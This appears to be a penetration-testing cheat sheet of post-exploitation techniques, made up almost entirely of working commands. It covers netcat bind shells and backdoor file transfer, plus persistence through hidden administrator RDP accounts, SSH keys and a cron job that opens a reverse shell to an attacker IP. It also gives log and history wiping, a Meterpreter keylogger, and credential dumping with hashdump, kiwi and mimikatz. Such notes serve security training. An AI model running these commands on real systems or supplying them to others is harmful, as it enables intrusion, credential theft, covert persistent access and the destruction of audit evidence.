offsecnotes
Star

Post-exploitation essentials

Bind Shell

This type of shell is not preferred as the attacker directly connects to the target system and in most cases, ingress traffic is always blocked or flagged as suspicious.

# Windows (target)
nc -nvlp <target_port> -e cmd.exe 
nc.exe -nvlp <target_port> -e cmd.exe

# Linux (target)
nc -nvlp <target_port> -e /bin/bash

# Linux (attacker)
nc -nv <target_ip> <target_port>

# Windows (attacker)
nc.exe -nv <target_ip> <target_port>


# Linux Metasploit (attacker)
use multi/handler
set payload generic/shell_bind_tcp # Try also "linux/x64/shell_bind_tcp"
set rhost <target_ip>
set lport <target_port>
run

Transfer files

# Start web server
python3 -m http.server 8080
python2 -m SimpleHTTPServer 8080
php -S 127.0.0.1:8080

# Download (HTTP Windows)
certutil -urlcache -f http://<host>/backdoor.php backdoor.php
# Download (HTTP Linux)
wget http://<host>/backdoor.php

# Netcat [useful when the victim cannot reach you, but you can]
nc -nvlp <target_port> > backdoor.php         # [recepient]
nc -w 3 <ip> <target_port> < backdoor.php     # [sender]

# With base64
cat file | base64 -w 0 # get base64 [output is a single continuous line]
echo <output_base64> | base64 -d > file # create file

# Tips
# 1 tip - Progress Indicator in netcat
pv backdoor.php | nc -w 3 <ip> <target_port> # [sender] (install pv)
# 2 tip - Check md5
md5sum backdoor.php

# Note: netcat "-n" option means no DNS (only IP)

[Fully] interactive shell

Interactive shell

/bin/bash -i # Linux

Fully interactive shell

# 1 Step
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'

# 2 Step
CTRL + Z # Press CTRL + Z to background process and get back to your host machine

# 3 Step
stty raw -echo; fg

# 4 Step
export TERM=xterm

Automatic

# https://github.com/brightio/penelope
# Currently only Unix shells are fully supported. 
# There's basic support (netcat-like interaction + logging)

./penelope.py <port>               # Reverse shell
./penelope.py -c <target> <port>   # Bind shell

Persistence

Windows

(1) Metasploit - Module: Search persistence module (Windows). Ex: exploit/windows/local/persistence_service (Requires admin or system privileges). When you want to connect again set a listener to receive the connection

(2) Enable RDP

  • First way with metasploit: search enable_rdp (and set session). Then connect to victim.
Note: you need username and password, if you don’t have the password, change it net user <username> <new_pass> (suspicious in a real environment) or crack NTLM or you can create a new account and add it to administrator group.
  • Second way with metasploit/meterpreter (auto create account and settings):
# In meterpreter
run getgui -e -u user_you_want -p password_you_want

# This enables rdp service -> 
# Creates new user with the provided parameters -> 
# Hides user from windows login screen -> 
# Adds user to Remote Desktop Users and Administrators group

Linux

(1) Metasploit: Search persistence module (Linux). Example: post/linux/manage/sshkey_persistence (needed elevated privs - This module will add an SSH key to a specified user)

(2) Via SSH key: After gaining access to linux system, you can transfer SSH private key to local machine and use it to connect via SSH

(3) With cron jobs

# 1. Set up listener
# 2. Create a cronjob (every minute time format)
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1'" > cron 
# 3. This will replace the user's existing crontab with the contents of 'cron'
crontab cron

# Crontab for the current user
crontab -l 
# NOTE: if the command doesn't work try with another revshell

Clearing tracks

Windows

# Metasploit/Meterpreter
clearev  # Clear the Application, System, and Security logs on a Windows system

Linux

history -c                          # Clear history
cat /dev/null > ~/.bash_history     # Same as above

Keylogger

# With metasploit
keyscan_start          # Start keylogger
keyscan_dump print     # Captured strokes

Credential Dumping

Windows

Prerequisites: User must be a member a local Administrators.

(1) hashdump (Metasploit - Meterpreter)

# You may need to migrate meterpreter to NT AUTHORITY\SYSTEM process
migrate <PID explorer.exe>
hashdump

(2) Kiwi (Metasploit - Meterpreter)

# You may need to migrate meterpreter to NT AUTHORITY\SYSTEM process
migrate <PID explorer.exe>

load kiwi
# Retrieve all credentials (parsed)
creds_all 
# NTLM hashes for all of the user accounts on the system
lsa_dump_sam
# Find the clear text passwords
lsa_dump_secrets
# Note: from the Windows version 8.0+, windows don’t store any plain text password.
# So, it can be helpful for the older version of the Windows.

(3) Mimikatz

  1. Upload mimikatz.exe

  2. Execute mimkatz.exe

The first command you should run to get debug rights is:

privilege::debug

This should be a standard for running mimikatz as it SeDebugPrivilege access right enabled to run command such as sekurlsa::logonpasswords and lsadump::sam.

This should return Privilege ‘20’ OK.

  1. Find the clear text passwords
sekurlsa::logonpasswords
  1. Extract the NTLM hashes from the SAM. You must first run token::elevate to elevate to SYSTEM user privileges
token::elevate

lsadump::sam